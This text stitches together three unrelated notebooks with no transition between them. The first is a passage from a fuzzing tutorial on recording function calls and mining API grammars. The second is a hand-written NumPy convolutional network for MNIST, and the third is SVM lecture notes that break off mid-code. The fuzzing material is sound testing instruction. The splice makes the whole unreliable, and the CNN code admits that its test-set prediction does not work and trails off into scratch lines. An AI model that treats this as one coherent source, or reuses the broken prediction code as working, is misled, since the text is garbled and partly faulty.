Let us start with an example. The `power(x, y)` function returns $x^y$; it is but a wrapper around the equivalent `math.pow()` function. (Since `power()` is defined in Python, we can trace it – in contrast to `math.pow()`, which is implemented in C.)
```
import math
def power(x, y):
return math.pow(x, y)
```
Let us invoke `power()` while recording its arguments:
```
with CallCarver() as power_carver:
z = power(1, 2)
z = power(3, 4)
power_carver.arguments("power")
```
From this list of recorded arguments, we could now create a grammar for the `power()` call, with `x` and `y` expanding into the values seen:
```
from Grammars import START_SYMBOL, is_valid_grammar, new_symbol, extend_grammar
POWER_GRAMMAR = {
"<start>": ["power(<x>, <y>)"],
"<x>": ["1", "3"],
"<y>": ["2", "4"]
}
assert is_valid_grammar(POWER_GRAMMAR)
```
When fuzzing with this grammar, we then get arbitrary combinations of `x` and `y`; aiming for coverage will ensure that all values are actually tested at least once:
```
from GrammarCoverageFuzzer import GrammarCoverageFuzzer
power_fuzzer = GrammarCoverageFuzzer(POWER_GRAMMAR)
[power_fuzzer.fuzz() for i in range(5)]
```
What we need is a method to automatically convert the arguments as seen in `power_carver` to the grammar as seen in `POWER_GRAMMAR`. This is what we define in the next section.
### A Grammar Miner for Calls
We introduce a class `CallGrammarMiner`, which, given a `Carver`, automatically produces a grammar from the calls seen. To initialize, we pass the carver object:
```
class CallGrammarMiner(object):
def __init__(self, carver, log=False):
self.carver = carver
self.log = log
```
#### Initial Grammar
The initial grammar produces a single call. The possible `<call>` expansions are to be constructed later:
```
import copy
class CallGrammarMiner(CallGrammarMiner):
CALL_SYMBOL = "<call>"
def initial_grammar(self):
return extend_grammar(
{START_SYMBOL: [self.CALL_SYMBOL],
self.CALL_SYMBOL: []
})
m = CallGrammarMiner(power_carver)
initial_grammar = m.initial_grammar()
initial_grammar
```
#### A Grammar from Arguments
Let us start by creating a grammar from a list of arguments. The method `mine_arguments_grammar()` creates a grammar for the arguments seen during carving, such as these:
```
arguments = power_carver.arguments("power")
arguments
```
The `mine_arguments_grammar()` method iterates through the variables seen and creates a mapping `variables` of variable names to a set of values seen (as strings, going through `call_value()`). In a second step, it then creates a grammar with a rule for each variable name, expanding into the values seen.
```
class CallGrammarMiner(CallGrammarMiner):
def var_symbol(self, function_name, var, grammar):
return new_symbol(grammar, "<" + function_name + "-" + var + ">")
def mine_arguments_grammar(self, function_name, arguments, grammar):
var_grammar = {}
variables = {}
for argument_list in arguments:
for (var, value) in argument_list:
value_string = call_value(value)
if self.log:
print(var, "=", value_string)
if value_string.find("<") >= 0:
var_grammar["<langle>"] = ["<"]
value_string = value_string.replace("<", "<langle>")
if var not in variables:
variables[var] = set()
variables[var].add(value_string)
var_symbols = []
for var in variables:
var_symbol = self.var_symbol(function_name, var, grammar)
var_symbols.append(var_symbol)
var_grammar[var_symbol] = list(variables[var])
return var_grammar, var_symbols
m = CallGrammarMiner(power_carver)
var_grammar, var_symbols = m.mine_arguments_grammar(
"power", arguments, initial_grammar)
var_grammar
```
The additional return value `var_symbols` is a list of argument symbols in the call:
```
var_symbols
```
#### A Grammar from Calls
To get the grammar for a single function (`mine_function_grammar()`), we add a call to the function:
```
class CallGrammarMiner(CallGrammarMiner):
def function_symbol(self, function_name, grammar):
return new_symbol(grammar, "<" + function_name + ">")
def mine_function_grammar(self, function_name, grammar):
arguments = self.carver.arguments(function_name)
if self.log:
print(function_name, arguments)
var_grammar, var_symbols = self.mine_arguments_grammar(
function_name, arguments, grammar)
function_grammar = var_grammar
function_symbol = self.function_symbol(function_name, grammar)
if len(var_symbols) > 0 and var_symbols[0].find("-self") >= 0:
# Method call
function_grammar[function_symbol] = [
var_symbols[0] + "." + function_name + "(" + ", ".join(var_symbols[1:]) + ")"]
else:
function_grammar[function_symbol] = [
function_name + "(" + ", ".join(var_symbols) + ")"]
if self.log:
print(function_symbol, "::=", function_grammar[function_symbol])
return function_grammar, function_symbol
m = CallGrammarMiner(power_carver)
function_grammar, function_symbol = m.mine_function_grammar(
"power", initial_grammar)
function_grammar
```
The additionally returned `function_symbol` holds the name of the function call just added:
```
function_symbol
```
#### A Grammar from all Calls
Let us now repeat the above for all function calls seen during carving. To this end, we simply iterate over all function calls seen:
```
power_carver.called_functions()
class CallGrammarMiner(CallGrammarMiner):
def mine_call_grammar(self, function_list=None, qualified=False):
grammar = self.initial_grammar()
fn_list = function_list
if function_list is None:
fn_list = self.carver.called_functions(qualified=qualified)
for function_name in fn_list:
if function_list is None and (function_name.startswith("_") or function_name.startswith("<")):
continue # Internal function
            # Ignore errors with mined functions
            try:
                function_grammar, function_symbol = self.mine_function_grammar(
                    function_name, grammar)
            except Exception:
                if function_list is not None:
                    raise
                continue  # skip functions that cannot be mined
if function_symbol not in grammar[self.CALL_SYMBOL]:
grammar[self.CALL_SYMBOL].append(function_symbol)
grammar.update(function_grammar)
assert is_valid_grammar(grammar)
return grammar
```
The method `mine_call_grammar()` is the one that clients can and should use – first for mining...
```
m = CallGrammarMiner(power_carver)
power_grammar = m.mine_call_grammar()
power_grammar
```
...and then for fuzzing:
```
power_fuzzer = GrammarCoverageFuzzer(power_grammar)
[power_fuzzer.fuzz() for i in range(5)]
```
With this, we have successfully extracted a grammar from a recorded execution; in contrast to "simple" carving, our grammar allows us to _recombine_ arguments and thus to fuzz at the API level.
## Fuzzing Web Functions
Let us now apply our grammar miner on a larger API – the `urlparse()` function we already encountered during carving.
```
with CallCarver() as webbrowser_carver:
webbrowser("https://www.fuzzingbook.org")
webbrowser("http://www.example.com")
```
We can mine a grammar from the calls encountered:
```
m = CallGrammarMiner(webbrowser_carver)
webbrowser_grammar = m.mine_call_grammar()
```
This is a rather large grammar:
```
call_list = webbrowser_grammar['<call>']
len(call_list)
print(call_list[:20])
```
Here's the rule for the `urlsplit()` function:
```
webbrowser_grammar["<urlsplit>"]
```
Here are the arguments. Note that besides the two URLs we passed (`https://www.fuzzingbook.org` and `http://www.example.com`), further variants may appear: opening an `http:` URL can redirect to an `https:` URL, which is then also processed by `urlsplit()`.
```
webbrowser_grammar["<urlsplit-url>"]
```
There also is some variation in the `scheme` argument:
```
webbrowser_grammar["<urlsplit-scheme>"]
```
If we now apply a fuzzer on these rules, we systematically cover all variations of arguments seen, including, of course, combinations not seen during carving. Again, we are fuzzing at the API level here.
```
urlsplit_fuzzer = GrammarCoverageFuzzer(
webbrowser_grammar, start_symbol="<urlsplit>")
for i in range(5):
print(urlsplit_fuzzer.fuzz())
```
Just as seen with carving, running tests at the API level is orders of magnitude faster than executing system tests. Hence, this calls for means to fuzz at the method level:
```
from urllib.parse import urlsplit
from Timer import Timer
with Timer() as urlsplit_timer:
urlsplit('http://www.fuzzingbook.org/', 'http', True)
urlsplit_timer.elapsed_time()
with Timer() as webbrowser_timer:
webbrowser("http://www.fuzzingbook.org")
webbrowser_timer.elapsed_time()
webbrowser_timer.elapsed_time() / urlsplit_timer.elapsed_time()
```
But then again, the caveats encountered during carving apply, notably the requirement to recreate the original function environment. If we also alter or recombine arguments, we get the additional risk of _violating an implicit precondition_ – that is, invoking a function with arguments the function was never designed for. Such _false alarms_, resulting from incorrect invocations rather than incorrect implementations, must then be identified (typically manually) and weeded out (for instance, by altering or constraining the grammar). The huge speed gains at the API level, however, may well justify this additional investment.
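As a hypothetical illustration of such a false alarm: a recombined call may pass an argument type the function was never designed for, producing a failure that reflects the invocation rather than the implementation:

```python
from urllib.parse import urlsplit

# urlsplit() expects a string (or bytes) URL; a recombined call passing, say,
# an integer fails -- a false alarm caused by the invocation, not by urlsplit()
try:
    urlsplit(123)
    raised = False
except Exception:
    raised = True
print("false alarm raised:", raised)
```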
## Synopsis
This chapter provides means to _record and replay function calls_ during a system test. Since individual function calls are much faster than a whole system run, such "carving" mechanisms have the potential to run tests much faster.
### Recording Calls
The `CallCarver` class records all calls occurring while it is active. It is used in conjunction with a `with` clause:
```
with CallCarver() as carver:
y = my_sqrt(2)
y = my_sqrt(4)
```
After execution, `called_functions()` lists the names of functions encountered:
```
carver.called_functions()
```
The `arguments()` method lists the arguments recorded for a function. This is a mapping of the function name to a list of lists of arguments; each argument is a pair (parameter name, value).
```
carver.arguments('my_sqrt')
```
Complex arguments are properly serialized, such that they can be easily restored.
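A minimal round-trip sketch of that serialization, using the standard `pickle` module as in the chapter:

```python
import pickle
from email.parser import Parser

parser = Parser()                              # a non-primitive argument value
restored = pickle.loads(pickle.dumps(parser))  # serialize, then reconstruct
print(type(restored).__name__)  # Parser
```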
### Synthesizing Calls
While these recorded arguments could already be turned into calls, a much nicer alternative is to create a _grammar_ for the recorded calls. This allows us to synthesize arbitrary _combinations_ of arguments, and also offers a base for further customization of calls.
The `CallGrammarMiner` class turns a list of carved executions into a grammar.
```
my_sqrt_miner = CallGrammarMiner(carver)
my_sqrt_grammar = my_sqrt_miner.mine_call_grammar()
my_sqrt_grammar
```
This grammar can be used to synthesize calls.
```
fuzzer = GrammarCoverageFuzzer(my_sqrt_grammar)
fuzzer.fuzz()
```
These calls can be executed in isolation, effectively extracting unit tests from system tests:
```
eval(fuzzer.fuzz())
```
## Lessons Learned
* _Carving_ allows for effective replay of function calls recorded during a system test.
* A function call can be _orders of magnitude faster_ than a system invocation.
* _Serialization_ allows us to create persistent representations of complex objects.
* Functions that heavily interact with their environment and/or access external resources are difficult to carve.
* From carved calls, one can produce API grammars that arbitrarily combine carved arguments.
## Next Steps
In the next chapter, we will discuss [how to reduce failure-inducing inputs](Reducer.ipynb).
## Background
Carving was invented by Elbaum et al. \cite{Elbaum2006} and originally implemented for Java. In this chapter, we follow several of their design choices (including recording and serializing method arguments only).
The combination of carving and fuzzing at the API level is described in \cite{Kampmann2018}.
## Exercises
### Exercise 1: Carving for Regression Testing
So far, during carving, we only have looked into reproducing _calls_, but not into actually checking the _results_ of these calls. This is important for _regression testing_ – i.e. checking whether a change to code does not impede existing functionality. We can build this by recording not only _calls_, but also _return values_ – and then later compare whether the same calls result in the same values. This may not work on all occasions; values that depend on time, randomness, or other external factors may be different. Still, for functionality that abstracts from these details, checking that nothing has changed is an important part of testing.
Our aim is to design a class `ResultCarver` that extends `CallCarver` by recording both calls and return values.
In a first step, create a `traceit()` method that also tracks return values by extending the `traceit()` method. The `traceit()` event type is `"return"` and the `arg` parameter is the returned value. Here is a prototype that only prints out the returned values:
```
class ResultCarver(CallCarver):
def traceit(self, frame, event, arg):
if event == "return":
if self._log:
print("Result:", arg)
super().traceit(frame, event, arg)
# Need to return traceit function such that it is invoked for return
# events
return self.traceit
with ResultCarver(log=True) as result_carver:
my_sqrt(2)
```
#### Part 1: Store function results
Extend the above code such that results are _stored_ in a way that associates them with the currently returning function (or method). To this end, you need to keep track of the _current stack of called functions_.
**Solution.** Here's a solution, building on the above:
```
class ResultCarver(CallCarver):
def reset(self):
super().reset()
self._call_stack = []
self._results = {}
def add_result(self, function_name, arguments, result):
key = simple_call_string(function_name, arguments)
self._results[key] = result
def traceit(self, frame, event, arg):
if event == "call":
code = frame.f_code
function_name = code.co_name
qualified_name = get_qualified_name(code)
self._call_stack.append(
(function_name, qualified_name, get_arguments(frame)))
if event == "return":
result = arg
(function_name, qualified_name, arguments) = self._call_stack.pop()
self.add_result(function_name, arguments, result)
if function_name != qualified_name:
self.add_result(qualified_name, arguments, result)
if self._log:
print(
simple_call_string(
function_name,
arguments),
"=",
result)
# Keep on processing current calls
super().traceit(frame, event, arg)
# Need to return traceit function such that it is invoked for return
# events
return self.traceit
with ResultCarver(log=True) as result_carver:
my_sqrt(2)
result_carver._results
```
#### Part 2: Access results
Give it a method `result()` that returns the value recorded for that particular function name and result:
```python
class ResultCarver(CallCarver):
    def result(self, function_name, argument):
        """Return the result recorded for function_name(argument)"""
```
**Solution.** This is mostly done in the code for part 1:
```
class ResultCarver(ResultCarver):
    def result(self, function_name, arguments):
        key = simple_call_string(function_name, arguments)
        return self._results[key]
```
#### Part 3: Produce assertions
For the functions called during `webbrowser()` execution, create a set of _assertions_ that check whether the result returned is still the same. Test this for `urllib.parse.urlparse()` and `urllib.parse.urlsplit()`.
**Solution.** Not too hard now:
```
with ResultCarver() as webbrowser_result_carver:
webbrowser("http://www.example.com")
for function_name in ["urllib.parse.urlparse", "urllib.parse.urlsplit"]:
for arguments in webbrowser_result_carver.arguments(function_name):
try:
call = call_string(function_name, arguments)
result = webbrowser_result_carver.result(function_name, arguments)
print("assert", call, "==", call_value(result))
except Exception:
continue
```
We can run these assertions:
```
from urllib.parse import SplitResult, ParseResult, urlparse, urlsplit
assert urlparse(
url='http://www.example.com',
scheme='',
allow_fragments=True) == ParseResult(
scheme='http',
netloc='www.example.com',
path='',
params='',
query='',
fragment='')
assert urlsplit(
url='http://www.example.com',
scheme='',
allow_fragments=True) == SplitResult(
scheme='http',
netloc='www.example.com',
path='',
query='',
fragment='')
```
We can now add these carved tests to a _regression test suite_ which would be run after every change to ensure that the functionality of `urlparse()` and `urlsplit()` is not changed.
### Exercise 2: Abstracting Arguments
When mining an API grammar from executions, set up an abstraction scheme to widen the range of arguments to be used during testing. If the values for an argument all conform to some type `T`, abstract it into `<T>`. For instance, if calls to `foo(1)`, `foo(2)`, `foo(3)` have been seen, the grammar should abstract its calls into `foo(<int>)`, with `<int>` being appropriately defined.
Do this for a number of common types: integers, positive numbers, floating-point numbers, host names, URLs, mail addresses, and more.
**Solution.** Left to the reader.
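A possible starting point (a sketch only, not a full solution): map recorded value strings to type symbols when all values of an argument parse to the same type.

```python
import ast

def abstract_symbol(value_strings):
    """Return a type symbol such as '<int>' if all recorded values share a type,
    or None if no common abstraction applies. A sketch handling a few types only."""
    try:
        values = [ast.literal_eval(s) for s in value_strings]
    except (ValueError, SyntaxError):
        return None  # e.g. pickled objects -- keep the concrete values instead
    for type_, symbol in [(bool, "<bool>"), (int, "<int>"),
                          (float, "<float>"), (str, "<str>")]:
        if all(type(v) is type_ for v in values):
            return symbol
    return None

print(abstract_symbol(["1", "2", "3"]))  # <int>
print(abstract_symbol(["'a'", "'bc'"]))  # <str>
```

Host names, URLs, and mail addresses would need additional recognizers (for instance, regular expressions) on top of this type-based scheme.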
```
# Import Module
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import h5py
# Read data, which has a size of N * 784 and N * 1
MNIST = h5py.File("../MNISTdata.hdf5",'r')
x_train = np.float32(MNIST['x_train'][:])
x_test = np.float32(MNIST['x_test'][:])
y_train = np.int32(MNIST['y_train'][:,0])
y_test = np.int32(MNIST['y_test'][:,0])
# Reshape samples as 28 * 28 images
x_trainnew = np.reshape(x_train, (len(x_train),28,28))
x_testnew = np.reshape(x_test, (len(x_test),28,28))
# Build activation functions
relu = lambda x: x*(x>0)
# Input an m * n matrix, output an m * n matrix whose rows are transformed and normalized
def softmax(X):
    # Subtract the row-wise max before exponentiating, for numerical stability
    Xexp = np.exp(X - np.max(X, axis=1, keepdims=True))
    return Xexp / np.sum(Xexp, axis=1, keepdims=True)
# Initialize the parameters
def param_init(input_size, kernel_size, output_size):
lx = input_size # 2-dim
lk = kernel_size # 2-dim
lh = (lx[0]-lk[0]+1, lx[1]-lk[1]+1) # Hidden layer size, 2-dim
ly = output_size # 1-dim
K = np.random.randn(lk[0],lk[1]) / max(lx)
W = np.random.randn(ly,lh[0],lh[1]) / max(lx)
b = np.zeros(ly)
return K,W,b
K,W,b = param_init((28,28),(3,3),10)
# Build the forward step
# Model: Z = X * K → H = relu(Z) → U = WH + b → Yhat = softmax(U)
def Convolution(image, kernel):
d1,d2 = image.shape
k1,k2 = kernel.shape
output_a = d1 - k1 + 1
output_b = d2 - k2 + 1
conv = np.zeros((output_a,output_b))
for a in range(output_a):
for b in range(output_b):
conv[a,b] = np.sum(np.multiply(image[a:a+k1,b:b+k2], kernel))
return conv
def forward_prop(X,K,W,b):
# Input to Hidden layer
Z = Convolution(X,K) # Shape: (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
H = relu(Z) # Shape: (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
# Hidden layer to Output
U = np.sum(np.multiply(W,H), axis=(1,2)) + b # Shape: (1 * ly)
U.shape = (1,W.shape[0])
Yhat = softmax(U) # Shape: (1 * ly)
return Z, H, Yhat
N = x_trainnew.shape[0]
r = np.random.randint(N)
x_samp = x_trainnew[r,:,:]
Y_oh = np.array(pd.get_dummies(np.squeeze(y_train)))
y_samp = Y_oh[[r]]
Z, H, Yhat = forward_prop(x_samp,K,W,b)
# Build the back-propagation step
def back_prop(K,W,b,Z,H,Yhat,X,Y,alpha):
bDel = Y - Yhat # Length ly
bDel = np.squeeze(bDel)
WDel = np.tensordot(bDel, H, axes=0) # Shape (ly, lx[0]-lk[0]+1, lx[1]-lk[1]+1)
HDel = np.tensordot(bDel, W, axes=1) # Shape (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
ZDel = np.multiply(HDel,(lambda x:(x>0))(Z)) # Shape (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
KDel = Convolution(X,ZDel) # Shape: (lk[0], lk[1])
#KDel = np.zeros(KDel.shape)
#WDel = np.zeros(WDel.shape)
#bDel = np.zeros(bDel.shape)
bn = b + alpha * bDel # Length ly
Wn = W + alpha * WDel # Shape (ly, lx[0]-lk[0]+1, lx[1]-lk[1]+1)
    Kn = K + alpha * KDel # Shape (lk[0], lk[1])
return Kn,Wn,bn
alpha = 0.01
Kn, Wn, bn = back_prop(K,W,b,Z,H,Yhat,x_samp,y_samp,alpha)
# Build the complete Neural Network
def TwoLayer_CNN_train(X, Y, ChannelSize = (3,3), NumChannel = 1, OrigAlpha = 0.01, num_epochs = 10):
# Recode Y as One-Hot
Y_oh = np.array(pd.get_dummies(np.squeeze(Y)))
# Indicate number of units per layer
N = X.shape[0] # Number of samples
xsize = X.shape[1:] # Size of every sample
ksize = ChannelSize # Size of the channel
ysize = Y_oh.shape[1] # Number of classes
    # Initialize the parameters
    K,W,b = param_init(xsize,ksize,ysize)
    # Run the training epochs, recording the accuracy each time
for epoch in range(num_epochs):
if epoch <= 5:
alpha = OrigAlpha
elif epoch <= 10:
alpha = OrigAlpha * 1e-1
elif epoch <= 15:
alpha = OrigAlpha * 1e-2
else:
alpha = OrigAlpha * 1e-3
total_cor = 0
for n in range(int(N/6)):
r = np.random.randint(N)
x_samp = X[r,:,:]
y_samp = Y_oh[[r]]
# Forward
Z, H, Yhat = forward_prop(x_samp,K,W,b)
pred = np.argmax(Yhat)
if pred==Y[r]:
total_cor += 1
# Backward
K,W,b = back_prop(K,W,b,Z,H,Yhat,x_samp,y_samp,alpha)
        print("Training Accuracy: ", total_cor / (N / 6))
return K,W,b
K,W,b = TwoLayer_CNN_train(x_trainnew, y_train, OrigAlpha=0.01, num_epochs=10)
# For a given neural network, predict an input X
def predict_NN(X,K,W,b):
X_predprob = forward_prop(X,K,W,b)[2]
X_pred = X_predprob.argmax(axis=1) # Take the biggest probability as its choice
return X_pred
# Predict on test set
# Still has problems: forward_prop expects a single 2-D image,
# so passing the whole 3-D test set fails
y_predtest = predict_NN(x_testnew,K,W,b)
np.sum(y_predtest == y_test) / x_testnew.shape[0]
Ut = np.array([1,2,3])
Ut.shape = (1,3)
Wt = np.array([[[1,1],[2,2]],[[3,3],[4,4]],[[5,5],[6,6]]])
Ht = np.array([[0.3,0.3],[0.4,0.4]])
kt = np.sum(np.multiply(Wt,Ht),axis=(1,2))
np.tensordot(Ut,Wt,axes=1)
```
```
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import matplotlib
%matplotlib inline
matplotlib.rcParams['figure.figsize'] = (12, 8)  # set default figure size, 12in by 8in
```
This week, you will be learning about the support vector machine (SVM) algorithm. SVMs are considered by many to be the most powerful 'black box' learning algorithm, and by posing a cleverly-chosen optimization objective, one of the most widely used learning algorithms today.
# Video W7 01: Optimization Objective
[YouTube Video Link](https://www.youtube.com/watch?v=r3uBEDCqIN0&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=71)
One way of understanding the SVM is as a simple modification of logistic regression (just as logistic regression is a simple extension of linear regression, and neural networks extend the concepts of logistic regression, and so on).
Recall that the basic modification we made for logistic regression was to pass our hypothesis through a logistic (or sigmoid)
function. This caused the output from our hypothesis to always be bound to a value in the range from 0.0 to 1.0
$$
h_{\theta}(x) = \frac{1}{1 + e^{-\theta^T x}}
$$
```
def sigmoid(z):
return 1.0 / (1.0 + np.e**-z)
plt.figure()
x = np.linspace(-5.0, 5.0)
z = sigmoid(x)
plt.plot(x, z)
plt.axis([-5, 5, 0, 1])
plt.grid()
plt.xlabel('$z = \\theta^Tx$', fontsize=20)
plt.text(-1, 0.85, '$h_{\\theta}(x) = g(z)$', fontsize=20);
```
Recall that for a single input/output pair $(x, y)$, the objective or cost function for logistic regression has the following form:
$$
-y \;\; \textrm{log} \frac{1}{1 + e^{-\theta^T x}} - (1 - y) \;\; \textrm{log} \; \big(1 - \frac{1}{1 + e^{-\theta^T x}}\big)
$$
This expression involves only the left or the right term, depending on whether $y = 1$ or $y = 0$ (recall that in logistic
regression we are performing a classification, where each training example either is in the class or is not).
So for example, if we want $y = 1$, then we want $\theta^Tx \gg 0$. The curve for the function when $y = 1$ looks like the
following:
```
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 / (1.0 + np.exp(-z)) )
plt.figure()
plt.plot(z, y)
plt.xlabel('$z$', fontsize=20)
plt.grid()
plt.text(1, 3, '$-log \\; \\frac{1}{1 + e^{-z}}$', fontsize=20);
```
Likewise, for the case where $y = 0$ then we want $\theta^T x \ll 0$. The curve for the objective function when $y = 0$ similarly
looks like the following:
```
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 - (1.0 / (1.0 + np.exp(-z))) )
plt.figure()
plt.plot(z, y)
plt.xlabel('$z$', fontsize=20)
plt.grid()
plt.text(-3, 3, '$-log \\; ( 1 - \\frac{1}{1 + e^{-z}} )$', fontsize=20);
```
The full cost function we were trying to minimize, then, for logistic regression was:
$$
\frac{1}{m} \big[ \sum_{i=1}^{m} y^{(i)} \big( - \textrm{log} \; h_{\theta}(x^{(i)}) \big) +
(1 - y^{(i)}) \big( - \textrm{log} \; (1 - h_{\theta}(x^{(i)})) \big) \big] + \frac{\lambda}{2m} \sum_{j=1}^{n} \theta_j^2
$$
For the support vector machine, we change the terms relating to the hypothesis to functions $\textrm{cost}_1$ and
$\textrm{cost}_0$:
$$
\frac{1}{m} \big[ \sum_{i=1}^{m} y^{(i)} \; \textrm{cost}_1( \theta^{T} x^{(i)} )
+ (1 - y^{(i)}) \; \textrm{cost}_0 ( \theta^{T} x^{(i)} ) \big]
+ \frac{\lambda}{2m} \sum_{j=1}^{n} \theta_j^2
$$
As described in the video, by convention in SVM we remove the division by $m$ and we parameterize the regularization and cost
terms a bit differently. Usually you will see the objective function for SVM specified in this slightly different but equivalent
form:
$$
\underset{\theta}{\textrm{min}} \; C
\sum_{i=1}^{m} \big[ y^{(i)} \; \textrm{cost}_1( \theta^{T} x^{(i)} )
+ (1 - y^{(i)}) \; \textrm{cost}_0 ( \theta^{T} x^{(i)} ) \big]
+ \frac{1}{2} \sum_{j=1}^{n} \theta_j^2
$$
In this formulation of the objective function, the term C is being used as the regularization parameter. But now, the larger
the value of C, the more emphasis that is placed on the cost terms (and the less that is placed on the regularization term).
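As a small concrete sketch, the objective above can be computed directly if we adopt the standard hinge-style definitions $\textrm{cost}_1(z) = \textrm{max}(0, 1 - z)$ and $\textrm{cost}_0(z) = \textrm{max}(0, 1 + z)$ (these exact forms are an assumption here; the videos only describe their shape, which we plot below):

```python
import numpy as np

def cost_1(z):  # penalty when y = 1; zero once z >= 1
    return np.maximum(0.0, 1.0 - z)

def cost_0(z):  # penalty when y = 0; zero once z <= -1
    return np.maximum(0.0, 1.0 + z)

def svm_objective(theta, X, y, C):
    """C * (sum of per-example costs) + 0.5 * sum of theta_j^2 for j >= 1.
    X includes a leading column of 1s; theta[0] (the intercept) is not regularized."""
    z = X @ theta
    cost = np.sum(y * cost_1(z) + (1 - y) * cost_0(z))
    return C * cost + 0.5 * np.sum(theta[1:] ** 2)

# tiny made-up example: two training points, one raw feature
X_demo = np.array([[1.0, 2.0], [1.0, -2.0]])
y_demo = np.array([1, 0])
theta_demo = np.array([0.0, 1.0])
print(svm_objective(theta_demo, X_demo, y_demo, C=1.0))  # 0.5
```

Both points here satisfy their margin condition ($z \geq 1$ for the positive example, $z \leq -1$ for the negative one), so only the regularization term contributes to the objective.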
# Video W7 02: Large Margin Intuition
[YouTube Video Link](https://www.youtube.com/watch?v=yjH3ZSPqLhU&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=72)
Because of the form of the $\textrm{cost}_0$ and $\textrm{cost}_1$ functions (which we haven't specified yet), the
optimization naturally favors decision boundaries that give wide margins between the hypothesis outputs for $y=0$ and $y=1$.
Intuitively, as shown in the video, the objective function that we have defined will find decision boundaries that maximize
the margin between the negative and positive examples. This is where the name large margin classifier comes from. The
term `support vector` from the name for SVM also refers to the mathematical properties of these objective functions that
try and maximize this margin between positive and negative examples.
The $cost_0$ and $cost_1$ functions described in the video are basically the same idea as using
what are known as rectified linear units (ReLU) in neural networks. Here we give a linear
activation response when the value is above (or below) some threshold, and 0 otherwise.
The following figures compare a possible implementation of the discussed $cost_0$ and $cost_1$ functions
to this type of thresholded ReLU activation function.
```
def cost_0(z):
return np.where(z > -1, z+1, 0)
def cost_1(z):
return np.where(z < 1, -z+1, 0)
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 / (1.0 + np.exp(-z)) )
# logistic cost function, for y=1
plt.figure()
plt.plot(z, y, label='logistic cost function $y=1$')
plt.xlabel('$z$', fontsize=20)
plt.grid()
# cost_1 function, RELU like
y = cost_1(z)
plt.plot(z, y, label='$cost_1$ RELU approximation for SVM')
plt.legend();
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 - (1.0 / (1.0 + np.exp(-z))) )
# logistic cost function, for y=0
plt.figure()
plt.plot(z, y, label='logistic cost function $y=0$')
plt.xlabel('$z$', fontsize=20)
plt.grid()
# cost_0 function, RELU like
y = cost_0(z)
plt.plot(z, y, label='$cost_0$ RELU approximation for SVM')
plt.legend();
```
# Video W7 03: Mathematics Behind Large Margin Intuition (Optional)
[YouTube Video Link](https://www.youtube.com/watch?v=Jm49m7ey34o&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=73)
The nitty gritty of the mathematics behind how the SVM optimization finds large margin decision boundaries is not necessary
for using SVM well. But at least watch the video to get a bit of a feel for what happens behind the scenes when creating an SVM
and how it finds such decision boundaries given our definition of the cost function.
# Video W7 04: Kernels I
[YouTube Video Link](https://www.youtube.com/watch?v=0Fg2U6LN3pg&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=74)
This video starts by giving a good explanation of what are known as gaussian feature kernels. When we looked at logistic
regression, we did examine using nonlinear features to produce more complex decision boundaries. Kernel methods, used
most commonly with SVM systems, allow us to create sets of nonlinear features, but in a more directed and less random way
than simply using polynomial combinations of basic features.
The [gaussian function](https://en.wikipedia.org/wiki/Gaussian_function) discussed in the video is related to gaussian
or normal distributions that you may be familiar with (e.g. the standard 'bell curve' distribution). For a single
feature, the gaussian function is usually specified in terms of $\mu$, the mean or location of the feature, and
$\sigma^2$ the variance (the square of the standard deviation) of the feature. So for example, as given in the video, we can think of
the similarity measure for a system that has a single feature, with a landmark at the point $\mu = 0$ as follows:
$$
f(x) = exp \Big(- \frac{(x - \mu)^2}{2\sigma^2} \Big)
$$
The expression $(x - \mu)^2$ is really just an expression of the squared distance from some input $x$ to the landmark. So
when we only have a single feature, and our landmark is at the origin point 0 (e.g. $\mu = 0$) then we have:
```
def gauss(x, mu, sigma):
return np.exp(- (x - mu)**2.0 / (2 * sigma**2.0))
x = np.linspace(-3.0, 3.0)
plt.figure()
plt.plot(x, gauss(x, 0.0, 1.0), 'k-')
plt.xlabel('$x_1$', fontsize=20)
plt.ylabel('gaussian similarity function');
```
This is the basic gaussian distribution, with a mean of 0 and a standard deviation of 1. In the context of a gaussian kernel
function, we will return a similarity of 1.0 for any feature that is exactly the same as our landmark ($\mu$ or 0 in this case),
and we will return lesser values, eventually approaching 0, as we get a further distance from the landmark $\mu$ location of 0.
In the videos, the linear algebra norm simply calculates the distance from an input $x$ when we have more than 1 feature. So for
example, when we have 2 features, or 2 dimensional space, we need to visualize the gaussian function using a 3 dimensional plot,
where we plot our two features $x_1$ and $x_2$ on two orthogonal axis, and plot the gaussian function on the 3rd orthogonal
z axis.
So for example, as shown in the video, if we have 2 features, and our landmark is located at the position where $x_1 = 3$
and $x_2 = 5$, e.g.
$$
l^{(1)} =
\begin{bmatrix}
3 \\
5 \\
\end{bmatrix}
$$
We will simply have a gaussian function in 2 dimensions (features) that has a value of 1.0 exactly at that $\mu$ location (in
2 dimensions), and falls away in the bell curve shape in both dimensions as a function of the $\sigma$ (the deviation value).
So the gaussian similarity function written in the video is:
$$
f_1 = \mathrm{exp} \Big(- \frac{ \|x - l^{(1)}\|^2 }{2 \sigma^2} \Big)
$$
The top part of the fraction is simply calculating the squared distance between some point $x$ and the landmark location in a 2 or higher
dimensional space (e.g. the sum of the squared differences along each individual dimension; in
linear algebra this is simply the square of the norm of the difference of these two vectors). So for a two dimensional feature, the gaussian function can
be plotted on a 3D plot in python as follows:
```
# first plot as a contour map
def gauss(x, mu, sigma):
"""A multi-dimensional version of the gaussian function. x and mu are n dimensional feature vectors, so
we take the linear algebra norm of the difference and square it."""
from numpy.linalg import norm
return np.exp(- norm(x - mu, axis=1)**2.0 / (2 * sigma**2.0))
# the landmark, I have been calling it mu
mu = np.array([3, 5])
sigma = 1.0
# we create a mesh so we can plot our gaussian function in 3d
x1_min, x1_max = -2.0, 8.0
x2_min, x2_max = 0.0, 10.0
h = 0.02 # step size in the mesh
